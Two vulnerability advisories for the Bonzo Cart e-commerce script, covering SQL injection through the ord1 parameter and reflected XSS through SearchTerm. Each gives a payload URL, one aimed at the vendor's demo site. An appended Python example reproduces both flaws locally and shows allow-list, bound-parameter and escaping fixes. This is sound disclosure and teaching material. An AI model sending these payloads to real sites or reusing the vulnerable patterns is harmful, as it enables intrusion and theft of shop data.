==============================
# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All versions
# Tested on: All versions are vulnerable

ISSUE

SQL Injection is possible through the ord1 parameter of searchresults.php (the sort column, paired with ord2=asc). A single quote in ord1 is passed into the query unfiltered and breaks it.

Example (normal request):
searchresults.php?ord1=&ord2=asc&search1=&SearchTerm=&where=ItemName

Exploit:
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

Demo:
http://demo.turnkeycentral.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName

==============================
# Exploit Title: Bonzo Cart (E-Commerce System) Cross Site Scripting
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All versions
# Tested on: All versions are vulnerable

ISSUE

Reflected Cross Site Scripting is possible through the SearchTerm parameter of searchresults.php, which is echoed back into the page without output encoding. The payload closes the surrounding quoted attribute and tag ("/></a></>) and then injects its own element.

Example (normal request):
/searchresults.php?SearchTerm=&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14

Exploit:
/searchresults.php?SearchTerm="%2F><%2Fa><%2F>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14

Demo:
http://demo.turnkeycentral.com/bonzacart/searchresults.php?SearchTerm=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
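The following is an added worked example, not code from the advisory or from Bonzo Cart itself. It reproduces both issues above (the ord1 sort-column injection and the SearchTerm reflection) against a constructed in-memory SQLite table and then shows the fixes a practitioner would apply: an allow-list for column and direction names (identifiers cannot be bound as query parameters), a bound parameter for the search term, and attribute-safe HTML escaping for the reflected value. The query strings are taken from the advisory; the table schema, the HTML template and all function names are assumptions made for the demonstration.

```python
import html
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the shop's product table; the real Bonzo Cart schema
# is not part of the advisory, so these column names are an assumption.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (ItemName TEXT, Price REAL)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("Widget", 9.99), ("Gadget", 19.99), ("Gizmo", 4.50)])
    return conn

def params(query_string):
    """First value of every query parameter, blanks included (ord1= is a legal request)."""
    return {k: v[0] for k, v in parse_qs(query_string, keep_blank_values=True).items()}

def search_vulnerable(conn, query_string):
    """Pattern the advisory's payload implies: column, sort and search term are
    spliced into the SQL text, so ord1='1 leaves an unterminated string literal."""
    q = params(query_string)
    sql = (f"SELECT ItemName, Price FROM items "
           f"WHERE {q.get('where', 'ItemName')} LIKE '%{q.get('SearchTerm', '')}%' "
           f"ORDER BY {q.get('ord1', 'ItemName')} {q.get('ord2', 'asc')}")
    return conn.execute(sql).fetchall()

ALLOWED_COLUMNS = {"ItemName", "Price"}          # assumed sortable/filterable columns
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def search_hardened(conn, query_string):
    """Identifiers cannot be bound, so where/ord1/ord2 are checked against an
    allow-list; only SearchTerm (data) is passed as a bound parameter."""
    q = params(query_string)
    col = q.get("where", "ItemName")
    sort = q.get("ord1", "ItemName")
    direction = q.get("ord2", "asc").lower()
    if col not in ALLOWED_COLUMNS or sort not in ALLOWED_COLUMNS:
        raise ValueError("unexpected column name")
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("unexpected sort direction")
    sql = (f"SELECT ItemName, Price FROM items WHERE {col} LIKE ? "
           f"ORDER BY {sort} {ALLOWED_DIRECTIONS[direction]}")
    return conn.execute(sql, (f"%{q.get('SearchTerm', '')}%",)).fetchall()

def render_vulnerable(search_term, rows):
    """Assumed template that echoes SearchTerm raw inside a quoted href, the
    context the advisory's "/></a> payload breaks out of."""
    items = "".join(f"<li>{html.escape(name)}</li>" for name, _ in rows)
    return (f'<a href="searchresults.php?SearchTerm={search_term}">Search again</a>'
            f"<ul>{items}</ul>")

def render_hardened(search_term, rows):
    """Same template with quote=True escaping: quotes and angle brackets become
    entities, so the injected <img onerror> stays text rather than markup."""
    safe = html.escape(search_term, quote=True)
    items = "".join(f"<li>{html.escape(name)}</li>" for name, _ in rows)
    return f'<a href="searchresults.php?SearchTerm={safe}">Search again</a><ul>{items}</ul>'

# Query strings copied from the advisory.
BENIGN = "SearchTerm=&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14"
SQLI = "ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName"
XSS = ("SearchTerm=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E"
       "&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14")
INJECTED_TAG = "<img src=1.gif onerror=alert(1)>"

def run_demo():
    conn = make_db()
    out = {"benign": [name for name, _ in search_vulnerable(conn, BENIGN)]}
    try:
        search_vulnerable(conn, SQLI)
        out["sqli_vulnerable"] = "query ran"
    except sqlite3.OperationalError as e:
        out["sqli_vulnerable"] = f"SQL error: {e}"      # the error an attacker looks for
    try:
        search_hardened(conn, SQLI)
        out["sqli_hardened"] = "query ran"
    except ValueError as e:
        out["sqli_hardened"] = f"rejected: {e}"
    term = params(XSS)["SearchTerm"]
    rows = search_hardened(conn, XSS)                  # the term is data here, so it is safe to query
    out["xss_vulnerable_has_img"] = INJECTED_TAG in render_vulnerable(term, rows)
    out["xss_hardened_has_img"] = INJECTED_TAG in render_hardened(term, rows)
    return out

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Note that the SQL error raised by the vulnerable search is itself the oracle the advisory relies on: a server that surfaces database errors (or visibly changes its output) on ord1='1 confirms the sort column reaches the query unquoted. The hardened version never lets the attacker-controlled identifier reach the database at all, and the escaping fix is applied at output time in the attribute context where the value is reflected.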